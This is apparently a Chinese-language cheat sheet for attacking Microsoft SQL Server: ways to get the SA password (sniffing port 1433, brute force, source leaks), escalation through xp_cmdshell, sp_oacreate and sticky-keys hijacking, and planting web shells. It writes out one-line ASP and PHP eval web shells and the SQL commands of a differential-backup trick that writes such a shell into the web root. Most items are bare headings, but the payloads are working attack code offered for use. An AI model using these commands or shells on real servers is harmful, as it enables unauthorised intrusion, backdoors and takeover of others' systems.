1、SA口令的獲取
webshell或源代碼的獲取
源代碼泄露
嗅探(用CAIN等工具嗅探1433數據庫端口)
口令暴力破解
2、常見SQL server 提權命令
查看數據庫的版本(select @@version;)
查看數據庫所在服務器操作系統的參數
查看數據庫啟動的參數
查看數據庫啟動的時間
查看數據庫服務器名和實例名
查看用戶登錄信息
查看數據庫里所所有的存儲工程和函數
查看數據庫里用戶和進程的信息
恢復存儲過程
開啟和關閉xp_cmdshell
xp_cmdshell執行命令
開啟和關閉sp_oacreate
sp_oacreate刪除文件
sp_oacreate復制文件
sp_oacreate移動文件
sp_oacreate添加管理員用戶
開啟和關閉sp_makeweblask\
wscript.shell執行命令
shell.applocation執行命令
開啟和關閉openrowset
沙盒執行命令
注冊表劫持粘貼鍵
sp_oacreate替換粘貼鍵
public提權操作
echo一句話后門(echo <%eval request(cmd)%> >d:\wwwroot\ok.asp echo <? php @eval($_POST[cmd]);?> >cmd.php)
在mssql 中查詢password
3、通過數據庫備份獲取webshell
差異備份一句話木馬
backup database [當前數據庫名] to disk = 'c:\recycler\1.bak'
create table cmd (a image);
insert into cmd(a) values ('<%eval request("cmd")%>');
backup database [當前數據庫名] to disk = '網站絕對路徑' WITH DIFFERENTIAL,FORMAT--
LOG 備份一句話木馬(......)